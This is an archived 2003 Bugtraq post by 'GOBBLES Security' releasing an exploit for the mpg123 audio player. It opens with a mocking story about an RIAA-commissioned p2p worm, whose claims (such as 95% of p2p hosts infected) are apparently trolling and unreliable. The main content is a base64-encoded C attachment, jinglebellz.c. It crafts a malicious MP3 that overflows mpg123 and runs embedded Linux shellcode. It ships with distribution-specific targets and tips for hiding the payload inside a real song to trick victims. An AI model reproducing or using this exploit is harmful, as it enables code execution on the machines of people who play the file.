Local/remote mpg123 exploit
Date: Mon, 13 Jan 2003 10:23:18 -0800
From: gobbles@hushmail.com
To: bugtraq@securityfocus.com
Subject: Local/remote mpg123 exploit
--Hush_boundary-3e2304169e2b0
Content-type: text/plain
-----BEGIN PGP SIGNED MESSAGE-----
___ ___ ___ ___ _ ___ ___ ___ ___ ___ _ _ ___ ___ _______
/ __|/ _ \| _ ) _ ) | | __/ __| / __| __/ __| | | | _ \_ _|_ _\ \ / /
| (_ | (_) | _ \ _ \ |__| _|\__ \ \__ \ _| (__| |_| | /| | | | \ V /
\___|\___/|___/___/____|___|___/ |___/___\___|\___/|_|_\___| |_| |_|
"Putting the honey in honeynet since '98."
Introduction:
Several months ago, GOBBLES Security was recruited by the RIAA (riaa.org)
to invent, create, and finally deploy the future of antipiracy tools. We
focused on creating virii/worm hybrids to infect and spread over p2p nets.
Until we became RIAA contracters, the best they could do was to passively
monitor traffic. Our contributions to the RIAA have given them the power
to actively control the majority of hosts using these networks.
We focused our research on vulnerabilities in audio and video players.
The idea was to come up with holes in various programs, so that we could
spread malicious media through the p2p networks, and gain access to the
host when the media was viewed.
During our research, we auditted and developed our hydra for the following
media tools:
mplayer (www.mplayerhq.org)
WinAMP (www.winamp.com)
Windows Media Player (www.microsoft.com)
xine (xine.sourceforge.net)
mpg123 (www.mpg123.de)
xmms (www.xmms.org)
After developing robust exploits for each, we presented this first part of
our research to the RIAA. They were pleased, and approved us to continue
to phase two of the project -- development of the mechanism by which the
infection will spread.
It took us about a month to develop the complex hydra, and another month to
bring it up to the standards of excellence that the RIAA demanded of us. In
the end, we submitted them what is perhaps the most sophisticated tool for
compromising millions of computers in moments.
Our system works by first infecting a single host. It then fingerprints a
connecting host on the p2p network via passive traffic analysis, and
determines what the best possible method of infection for that host would
be. Then, the proper search results are sent back to the "victim" (not the
hard-working artists who p2p technology rapes, and the RIAA protects). The
user will then (hopefully) download the infected media file off the RIAA
server, and later play it on their own machine.
When the player is exploited, a few things happen. First, all p2p-serving
software on the machine is infected, which will allow it to infect other
hosts on the p2p network. Next, all media on the machine is cataloged, and
the full list is sent back to the RIAA headquarters (through specially
crafted requests over the p2p networks), where it is added to their records
and stored until a later time, when it can be used as evidence in criminal
proceedings against those criminals who think it's OK to break the law.
Our software worked better than even we hoped, and current reports indicate
that nearly 95% of all p2p-participating hosts are now infected with the
software that we developed for the RIAA.
Things to keep in mind:
1) If you participate in illegal file-sharing networks, your
computer now belongs to the RIAA.
2) Your BlackIce Defender(tm) firewall will not help you.
3) Snort, RealSecure, Dragon, NFR, and all that other crap
cannot detect this attack, or this type of attack.
4) Don't fuck with the RIAA again, scriptkids.
5) We have our own private version of this hydra actively
infecting p2p users, and building one giant ddosnet.
Due to our NDA with the RIAA, we are unable to give out any other details
concerning the technology that we developed for them, or the details on any
of the bugs that are exploited in our hydra.
However, as a demonstration of how this system works, we're providing the
academic security community with a single example exploit, for a mpg123 bug
that was found independantly of our work for the RIAA, and is not covered
under our agreement with the establishment.
Affected Software:
mpg123 (pre0.59s)
http://www.mpg123.de
Problem Type:
Local && Remote
Vendor Notification Status:
The professional staff of GOBBLES Security believe that by releasing our
advisories without vendor notification of any sort is cute and humorous, so
this is also the first time the vendor has been made aware of this problem.
We hope that you're as amused with our maturity as we are. ;PpPppPpPpPPPpP
Exploit Available:
Yes, attached below.
Technical Description of Problem:
Read the source.
Credits:
Special thanks to stran9er@openwall.com for the ethnic-cleansing shellcode.
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlwEARECABwFAj4jBA0VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAP4gwA
oKmMyRIxA74KZfAVv3MsEBKCZxRMAJsFFhywKWzMoiT/Qiy4FV+r1inukA==
=OjMp
-----END PGP SIGNATURE-----
--Hush_boundary-3e2304169e2b0
Content-type: application/octet-stream; name="jinglebellz.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="jinglebellz.c"
LyogCiAgIGppbmdsZWJlbGx6LmMgLSBsb2NhbC9yZW1vdGUgZXhwbG9pdCBmb3IgbXBnMTIzCiAg
IChjKSAyMDAzIEdPQkJMRVMgU2VjdXJpdHkgc2VYRm9yY2VzCgogICBUbyB1c2U6IAoJJCBnY2Mg
LW8gamluZ2xlYmVsbHogamluZ2xlYmVsbHouYwoJJCAuL2ppbmdsZWJlbGx6IFggb3duLm1wMwoJ
ICAod2hlcmUgWCBpcyB0aGUgdGFyZ2V0IG51bWJlcikKCSQgbXBnMTIzIG93bi5tcDMKCiAgIElm
IHlvdSBuZWVkIGhlbHAgZmluZGluZyBzcGVjaWZpYyB0YXJnZXRzIGZvciB0aGlzCiAgIGV4cGxv
aXQ6CgkkIC4vamluZ2xlYmVsbHogMiBkZWJ1Zy5tcDMKCSQgZ2RiCgkgKGdkYikgZmlsZSBtcGcx
MjMKCSAoZ2RiKSByIGRlYnVnLm1wMwoJIChnZGIpIHNldCAkcD0weGMwMDAwMDAwLTQKCSAoZ2Ri
KSB3aGlsZSgqJHAhPTB4NDE0MjQzNDgpCgkgID5zZXQgJHA9JHAtMQoJICA+ZW5kCgkgKGdkYikg
eC8kcAoJIDB4YmZmZjkyM2M6ICAgICAweDQxNDI0MzQ4CgogICBBZGQgdGhlIG5ldyB0YXJnZXQg
dG8gdGhlIHNvdXJjZSwgcmVjb21waWxlLCBhbmQgCiAgIHRyeSBpdCBvdXQhICBZb3UgbWlnaHQg
d2FudCB0byBzdXBwbHkgeW91ciBvd24KICAgc2hlbGxjb2RlIGlmIHlvdSdyZSBnb2luZyB0byB1
c2UgdGhpcyB0byBvd24geW91ciAKICAgZnJpZW5kcyA8Zz4uCgogICBGdW4gdGhpbmdzIHRvIGRv
OgogICAxKSBDcmVhdGUgYW4gZXZpbC5tcDMgYW5kIGFwcGVuZCBpdCB0byB0aGUgZW5kIG9mIGEK
ICAgICAgInJlYWwiIG1wMywgc28gdGhhdCB5b3VyIHZpY3RpbSBnZXRzIHRvIGxpc3RlbiB0bwog
ICAgICB0aGVpciBmYXZvcml0ZSB0dW5leiBiZWZvcmUgaGFuZGluZyBvdmVyIGFjY2Vzcy4KCiAg
ICAgIGV4OiAkIC4vamluZ2xlYmVsbHogWCBldmlsLm1wMyAKCSAgJCBjYXQgZXZpbC5tcDMgPj4i
TmlOIC0gVGhlIERheSB0aGUgV2hvbGUgV29ybGQgV2VudCBBd2F5Lm1wMyIgCiAgIAogICAyKSBM
YXVnaCBhdCBUaGVvIGZvciBub3QgcHJvdmlkaW5nIG1kNXN1bXMgZm9yIHRoZSBjb250ZW50cyBv
ZgogICAgICBmdHA6Ly9mdHAub3BlbmJzZC5vcmcvcHViL09wZW5CU0Qvc29uZ3MvLCBhbmQgY29u
dGludWUgbGF1Z2hpbmcKICAgICAgYXQgaGltIGZvciBnZXR0aW5nIGhpcyBib3hlcyBjb21wcmlt
aXNlZCB3aGVuICJ2ZXJpZnlpbmciIHRoZQogICAgICBpbnRlZ3JpdHkgb2YgdGhvc2UgbXAzJ3Mu
ICBHT09EIFdPUksgVEhFTyFAIyAqY2xhcCBjbGFwIGNsYXAgY2xhcCoKCiAgIFNwZWNpYWwgdGhh
bmtzIHRvIHN0cmFuOWVyIGZvciB0aGUgc2hlbGxjb2RlLiAKCiAgIFJlbWVtYmVyLCBOYXBzdGVy
IGlzIENvbW11bmlzbSwgc28gZmlnaHQgZm9yIHRoZSBBbWVyaWNhbgogICB3YXkgb2YgbGlmZS4K
DQogICBRdW90ZToNCgogICAiR09CQkxFUyBpcyBzbyAyMDAyIiAtLSBhbm9ueW1vdXMNCiAgIF5e
Xl5eXl5eXl5eXl5eXl5eXl5eDQogICBoZWhlaGVoZWhlaGVoZSA7UFBwUFBQUFBQcHBQUFBQcFAN
Cg0KICAgTG92ZSwNCiAgIEdPQkJMRVMNCiAgIA0KICAgU3BlY2lhbCB0aGFua3MgdG8gRGF2ZSBB
aG1lZCBmb3Igc3VwcG9ydGluZyB0aGlzIHJlbGVhc2UgOj4NCgoqLyAKIAogCiNpbmNsdWRlIDxz
dGRpby5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzeXMvc3RhdC5oPgojaW5j
bHVkZSA8ZmNudGwuaD4KI2luY2x1ZGUgPGVycm5vLmg+CgojZGVmaW5lIE5PUk1BTF9PVkYKCiNk
ZWZpbmUgVkVSU0lPTiAiMC4xIgoKI2RlZmluZSBGQUxTRSAgIDAKI2RlZmluZSBUUlVFICAgIDEK
CiNkZWZpbmUgV1JJVEVfRVJST1IgICB7IHBlcnJvcigid3JpdGUiKTsgY2xvc2UoZmQpOyBleGl0
KDEpOyB9CiNkZWZpbmUgU1RBVEUgICAgICAgICB7IGZwcmludGYoc3RkZXJyLCAiXG4qIGhlYWRl
ciAoJXApIHN0YXRlOiAleDogIiwgaGVhZGVyLCBzdGF0ZSk7IHN0YXRlICsrOyBsdGIoaGVhZGVy
KTsgfQojZGVmaW5lIE1QM19TSVpFICAgICAgKCgoMTYwICogMTQ0MDAwKS84MDAwKSAtIDMpICsg
OCAgCgojZGVmaW5lIE1BWF9JTlBVVF9GUkFNRVNJWkUgMTkyMAoKdW5zaWduZWQgY2hhciBsaW51
eF9zaGVsbGNvZGVbXSA9IC8qIGNvbnRyaWJ1dGVkIGJ5IGFudGlOU0EgKi8KIlx4MzFceGMwXHgz
MVx4ZGJceDMxXHhjOVx4MzFceGQyXHhiMFx4M2JceDUwXHgzMVx4YzBceDY4XHg2ZiIKIlx4NzJc
eDc0XHgwYVx4NjhceDZmXHgyMFx4NjFceDYyXHg2OFx4MmRceDYzXHgyMFx4NzRceDY4XHg0MyIK
Ilx4NTRceDUyXHg0Y1x4NjhceDczXHgyZVx4MmVceDIwXHg2OFx4NjNceDZmXHg2ZVx4NjRceDY4
XHgzNSIKIlx4MjBceDczXHg2NVx4NjhceDIwXHg2OVx4NmVceDIwXHg2OFx4NzJceDY2XHgyMFx4
N2VceDY4XHg3MiIKIlx4NmRceDIwXHgyZFx4YjNceDAyXHg4OVx4ZTFceGIyXHgyOVx4YjBceDA0
XHhjZFx4ODBceDMxXHhjMCIKIlx4MzFceGZmXHhiMFx4MDVceDg5XHhjN1x4MzFceGMwXHgzMVx4
ZGJceDMxXHhjOVx4MzFceGQyXHg2NiIKIlx4YmFceDcwXHg1MFx4NTJceGIzXHgwMlx4ODlceGUx
XHgzMVx4ZDJceGIyXHgwMlx4YjBceDA0XHhjZCIKIlx4ODBceDMxXHhjMFx4MzFceGRiXHgzMVx4
YzlceDUwXHg0MFx4NTBceDg5XHhlM1x4YjBceGEyXHhjZCIKIlx4ODBceDRmXHgzMVx4YzBceDM5
XHhjN1x4NzVceGQxXHgzMVx4YzBceDMxXHhkYlx4MzFceGM5XHgzMSIKIlx4ZDJceDY4XHg2Nlx4
MjBceDdlXHg1OFx4NjhceDZkXHgyMFx4MmRceDcyXHg2OFx4MmRceDYzXHg1OCIKIlx4NzJceDY4
XHg0MVx4NDFceDQxXHg0MVx4NjhceDQxXHg0MVx4NDFceDQxXHg2OFx4NDFceDQxXHg0MSIKIlx4
NDFceDY4XHg0MVx4NDFceDQxXHg0MVx4NjhceDJmXHg3M1x4NjhceDQzXHg2OFx4MmZceDYyXHg2
OSIKIlx4NmVceDMxXHhjMFx4ODhceDQ0XHgyNFx4MDdceDg4XHg0NFx4MjRceDFhXHg4OFx4NDRc
eDI0XHgyMyIKIlx4ODlceDY0XHgyNFx4MDhceDMxXHhkYlx4OGRceDVjXHgyNFx4MThceDg5XHg1
Y1x4MjRceDBjXHgzMSIKIlx4ZGJceDhkXHg1Y1x4MjRceDFiXHg4OVx4NWNceDI0XHgxMFx4ODlc
eDQ0XHgyNFx4MTRceDMxXHhkYiIKIlx4ODlceGUzXHg4ZFx4NGNceDI0XHgwOFx4MzFceGQyXHg4
ZFx4NTRceDI0XHgxNFx4YjBceDBiXHhjZCIKIlx4ODBceDMxXHhkYlx4MzFceGMwXHg0MFx4Y2Rc
eDgwIjsKCnN0cnVjdCB4cGwKewogIHVuc2lnbmVkIGNoYXIgKm5hbWU7CiAgdW5zaWduZWQgbG9u
ZyBhZGRybG9jOyAvKiBMT0NBVElPTiBvZiBvdXIgaW50ZW5kZWQgZnVuYy4gcHRyICovCiAgdW5z
aWduZWQgbG9uZyBhbGxpZ247CiAgdW5zaWduZWQgY2hhciAqc2M7CiAgc2l6ZV90IHNjbGVuOwp9
IHRbXSA9IAp7CiAgeyAiUHJlcGFyZSBldmlsIG1wMyBmb3IgU3VTRSA4LjAiLCAweGJmZmY5MjNj
LCAwLCBsaW51eF9zaGVsbGNvZGUsIHNpemVvZihsaW51eF9zaGVsbGNvZGUpIH0sCiAgeyAiUHJl
cGFyZSBldmlsIG1wMyBmb3IgU2xhY2t3YXJlIDguMCIsIDB4YmZmZjk2ZjQsIDAsIGxpbnV4X3No
ZWxsY29kZSwgc2l6ZW9mKGxpbnV4X3NoZWxsY29kZSkgfSwKICB7ICJEZWJ1ZyIsIDB4NDE0MjQz
NDQsIDAsIGxpbnV4X3NoZWxsY29kZSwgc2l6ZW9mKGxpbnV4X3NoZWxsY29kZSkgfSwgCiAgeyBO
VUxMLCAweDAwMDAwMDAwLCAwLCBOVUxMLCAwIH0KfTsKIAppbnQKaGVhZF9jaGVjayh1bnNpZ25l
ZCBsb25nIGhlYWQpCnsgICAgCiAgaWYgKChoZWFkICYgMHhmZmUwMDAwMCkgIT0gMHhmZmUwMDAw
MCkKICAgIHJldHVybiBGQUxTRTsKICBpZiAoISgoaGVhZCA+PiAxNykgJiAzKSkgICAKICAgIHJl
dHVybiBGQUxTRTsKICBpZiAoKChoZWFkID4+IDEyKSAmIDB4ZikgPT0gMHhmKQogICAgcmV0dXJu
IEZBTFNFOwogIGlmICgoKGhlYWQgPj4gMTApICYgMHgzKSA9PSAweDMpCiAgICByZXR1cm4gRkFM
U0U7CiAgcmV0dXJuIFRSVUU7Cn0KCnZvaWQKYnRiKHVuc2lnbmVkIGNoYXIgYnl0ZSkKewogIGlu
dCBzaGlmdDsKICB1bnNpZ25lZCBpbnQgYml0OwogIHVuc2lnbmVkIGNoYXIgbWFzazsKCiAgZm9y
IChzaGlmdCA9IDcsIG1hc2sgPSAweDgwOyBzaGlmdCA+PSAwOyBzaGlmdCAtLSwgbWFzayAvPSAy
KQogIHsKICAgIGJpdCA9IDA7CiAgICBiaXQgPSAoYnl0ZSAmIG1hc2spID4+IHNoaWZ0OwogICAg
ZnByaW50ZihzdGRlcnIsICIlMDFkIiwgYml0KTsKICAgIGlmIChzaGlmdCA9PSA0KSBmcHV0Yygn
ICcsIHN0ZGVycik7CiAgfQogIGZwdXRjKCcgJywgc3RkZXJyKTsKfQoKdm9pZApsdGIodW5zaWdu
ZWQgbG9uZyBibGFoKQp7CiAgYnRiKCh1bnNpZ25lZCBjaGFyKSgoYmxhaCA+PiAyNCkgJiAweGZm
KSk7CiAgYnRiKCh1bnNpZ25lZCBjaGFyKSgoYmxhaCA+PiAxNikgJiAweGZmKSk7CiAgYnRiKCh1
bnNpZ25lZCBjaGFyKSgoYmxhaCA+PiA4KSAmIDB4ZmYpKTsKICBidGIoKHVuc2lnbmVkIGNoYXIp
KGJsYWggJiAweGZmKSk7Cn0KCmludAptYWluKGludCBhcmdjLCBjaGFyICoqYXJndikKewogIGlu
dCBmZDsKICB1bnNpZ25lZCBsb25nIGhlYWRlcjsKICB1bnNpZ25lZCBpbnQgaTsKICB1bnNpZ25l
ZCBpbnQgc3RhdGU7ICAgCiAgdW5zaWduZWQgaW50IHRjb3VudDsKICB1bnNpZ25lZCBjaGFyIGxf
YnVmWzRdOwoKICBmcHJpbnRmKHN0ZGVyciwgIkAhIEppbmdsZWJlbGx6LmM6IG1wZzEyMyBmcmFt
ZSBoZWFkZXIgaGFuZGxpbmcgZXhwbG9pdCwgJXMgQCFcblxuIiwgVkVSU0lPTik7CgogIGlmIChh
cmdjIDwgMykKICB7CiAgICBmcHJpbnRmKHN0ZGVyciwgIlVzYWdlOiAlcyA8dGFyZ2V0Iz4gPGV2
aWwubXAzIG5hbWU+XG5cblRhcmdldCBsaXN0OlxuXG4iLCBhcmd2WzBdKTsKICAgIGZvciAodGNv
dW50ID0gMDsgdFt0Y291bnRdLm5hbWUgIT0gTlVMTDsgdGNvdW50ICsrKSBmcHJpbnRmKHN0ZGVy
ciwgIiVkICVzXG4iLCB0Y291bnQsIHRbdGNvdW50XS5uYW1lKTsKICAgIGZwdXRjKCdcbicsIHN0
ZGVycik7CiAgICBleGl0KDApOwogIH0KICB0Y291bnQgPSBhdG9pKGFyZ3ZbMV0pOwogIGlmICgo
ZmQgPSBvcGVuKGFyZ3ZbMl0sIE9fQ1JFQVR8T19XUk9OTFl8T19UUlVOQywgMDA3MDApKSA9PSAt
MSkKICB7CiAgICBwZXJyb3IoIm9wZW4iKTsKICAgIGV4aXQoMSk7CiAgfQogIHN0YXRlID0gMDsK
ICBmcHJpbnRmKHN0ZGVyciwgIisgZmlsbGluZyBib2d1cyBtcDMgZmlsZVxuIik7CiAgZm9yIChp
ID0gMDsgaSA8IE1QM19TSVpFOyBpICsrKSBpZiAod3JpdGUoZmQsICJBIiwgMSkgPCAwKSBXUklU
RV9FUlJPUjsKICBmcHJpbnRmKHN0ZGVyciwgIisgcHJlcGFyaW5nIGV2aWwgaGVhZGVyIik7CiAg
aGVhZGVyID0gMHhmZmUwMDAwMDsgLyogc3RhcnQgc3RhdGUgKi8KICBTVEFURTsKICBoZWFkZXIg
fD0gMSA8PCAxODsgLyogc2V0IGJpdCAxOSwgbGF5ZXIgMiAqLwogIFNUQVRFOwogIGhlYWRlciB8
PSAxIDw8IDExOyAvKiBzZXQgYml0IDEyLCBmcmVxcyBpbmRleCA9PSA2ICsgKGhlYWRlcj4+MTAp
LCBzZSB3ZSBlbmQgdXAgd2l0aCBsb3dlc3QgZnJlcSAoODAwMCkgKi8KICBTVEFURTsKICBoZWFk
ZXIgfD0gMSA8PCAxNjsgLyogc2V0IGZyLT5lcnJvcl9wcm90ZWN0aW9uLCAob2ZmKSAqLwogIFNU
QVRFOwogIGhlYWRlciB8PSAxIDw8IDEzOwogIGhlYWRlciB8PSAxIDw8IDE0OwogIGhlYWRlciB8
PSAxIDw8IDE1OyAvKiBiaXRyYXRlIGluZGV4IHRvIGhpZ2hlc3QgcG9zc2libGUgKDB4Zi0weDEp
ICovCiAgU1RBVEU7CiAgaGVhZGVyIHw9IDEgPDwgOTsgLyogZnItPnBhZGRpbmcgPSAoKG5ld2hl
YWQ+PjkpJjB4MSk7ICovCiAgU1RBVEU7CiAgZnByaW50ZihzdGRlcnIsICJcbisgY2hlY2tpbmcg
aWYgaGVhZGVyIGlzIHZhbGlkOiAlc1xuIiwgaGVhZF9jaGVjayhoZWFkZXIpID09IEZBTFNFID8g
Ik5PIiA6ICJZRVMiKTsKICBsX2J1ZlszXSA9IGhlYWRlciAmIDB4ZmY7CiAgbF9idWZbMl0gPSAo
aGVhZGVyID4+IDgpICYgMHhmZjsKICBsX2J1ZlsxXSA9IChoZWFkZXIgPj4gMTYpICYgMHhmZjsK
ICBsX2J1ZlswXSA9IChoZWFkZXIgPj4gMjQpICYgMHhmZjsKICBsc2VlayhmZCwgMCwgU0VFS19T
RVQpOyAgCiAgaWYgKHdyaXRlKGZkLCBsX2J1Ziwgc2l6ZW9mKGxfYnVmKSkgPCAwKSBXUklURV9F
UlJPUjsKICBmcHJpbnRmKHN0ZGVyciwgIisgYWRkcmxvYzogJXBcbiIsIHRbdGNvdW50XS5hZGRy
bG9jKTsKICBsX2J1ZlswXSA9ICgodFt0Y291bnRdLmFkZHJsb2MgKyAweDA0KSkgJiAweGZmOyAK
ICBsX2J1ZlsxXSA9ICgodFt0Y291bnRdLmFkZHJsb2MgKyAweDA0KSA+PiA4KSAmIDB4ZmY7CiAg
bF9idWZbMl0gPSAoKHRbdGNvdW50XS5hZGRybG9jICsgMHgwNCkgPj4gMTYpICYgMHhmZjsKICBs
X2J1ZlszXSA9ICgodFt0Y291bnRdLmFkZHJsb2MgKyAweDA0KSA+PiAyNCkgJiAweGZmOwogIGlm
ICh3cml0ZShmZCwgbF9idWYsIHNpemVvZihsX2J1ZikpIDwgMCkgV1JJVEVfRVJST1I7CiAgbHNl
ZWsoZmQsIDAsIFNFRUtfU0VUKTsKICBsc2VlayhmZCwgTUFYX0lOUFVUX0ZSQU1FU0laRSAtIHRb
dGNvdW50XS5zY2xlbiwgU0VFS19TRVQpOwogIGZwcmludGYoc3RkZXJyLCAiKyB3cml0aW5nIHNo
ZWxsY29kZVxuIik7CiAgaWYgKHdyaXRlKGZkLCB0W3Rjb3VudF0uc2MsIHRbdGNvdW50XS5zY2xl
bikgPCAwKSBXUklURV9FUlJPUjsKICBmb3IgKGkgPSAwOyBpIDwgdFt0Y291bnRdLmFsbGlnbjsg
aSArKykgaWYgKHdyaXRlKGZkLCAiQSIsIDEpIDwgMCkgV1JJVEVfRVJST1I7CiNpZmRlZiBOT1JN
QUxfT1ZGCiAgbF9idWZbMF0gPSAoKHRbdGNvdW50XS5hZGRybG9jICsgTUFYX0lOUFVUX0ZSQU1F
U0laRS8yKSkgJiAweGZmOyAKICBsX2J1ZlsxXSA9ICgodFt0Y291bnRdLmFkZHJsb2MgKyBNQVhf
SU5QVVRfRlJBTUVTSVpFLzIpID4+IDgpICYgMHhmZjsKICBsX2J1ZlsyXSA9ICgodFt0Y291bnRd
LmFkZHJsb2MgKyBNQVhfSU5QVVRfRlJBTUVTSVpFLzIpID4+IDE2KSAmIDB4ZmY7CiAgbF9idWZb
M10gPSAoKHRbdGNvdW50XS5hZGRybG9jICsgTUFYX0lOUFVUX0ZSQU1FU0laRS8yKSA+PiAyNCkg
JiAweGZmOwojZWxzZQogIGxfYnVmWzBdID0gKCh0W3Rjb3VudF0uYWRkcmxvYyAtIDB4MDgpKSAm
IDB4ZmY7IAogIGxfYnVmWzFdID0gKCh0W3Rjb3VudF0uYWRkcmxvYyAtIDB4MDgpID4+IDgpICYg
MHhmZjsKICBsX2J1ZlsyXSA9ICgodFt0Y291bnRdLmFkZHJsb2MgLSAweDA4KSA+PiAxNikgJiAw
eGZmOwogIGxfYnVmWzNdID0gKCh0W3Rjb3VudF0uYWRkcmxvYyAtIDB4MDgpID4+IDI0KSAmIDB4
ZmY7CiNlbmRpZiAKICBmb3IgKGkgPSBNQVhfSU5QVVRfRlJBTUVTSVpFICsgdFt0Y291bnRdLmFs
bGlnbjsgaSA8IE1QM19TSVpFOyBpICs9IDQpIAogIHsKICAgIGlmICh3cml0ZShmZCwgbF9idWYs
IHNpemVvZihsX2J1ZikpIDwgMCkgV1JJVEVfRVJST1I7CiAgfQogIGxzZWVrKGZkLCAwLCBTRUVL
X1NFVCk7CiAgY2xvc2UoZmQpOwogIGZwcmludGYoc3RkZXJyLCAiKyBhbGwgZG9uZSwgJXMgaXMg
cmVhZHkgZm9yIHVzZVxuIiwgYXJndlsyXSk7CiAgZXhpdCgwKTsKfSAgCiAgCg==
--Hush_boundary-3e2304169e2b0
Content-type: text/plain; name="jinglebellz.c.sig"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="jinglebellz.c.sig"
LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0NClZlcnNpb246IEh1c2ggMi4yIChKYXZhKQ0K
Tm90ZTogVGhpcyBzaWduYXR1cmUgY2FuIGJlIHZlcmlmaWVkIGF0IGh0dHBzOi8vd3d3Lmh1c2h0
b29scy5jb20vdmVyaWZ5DQoNCndqOERCUUErSXdPMEhOR25seUdac0E4UkF1dXNBSjQ5Z0dTQ0p6
S2xScG4rN2I5dmQrR1l5ZFd6VVFDZ2pxM09mZTJuDQpXQm5sUU5mNEdleWFGVGl0NU4wPQ0KPVJC
amMNCi0tLS0tRU5EIFBHUCBTSUdOQVRVUkUtLS0tLQ0K
--Hush_boundary-3e2304169e2b0--
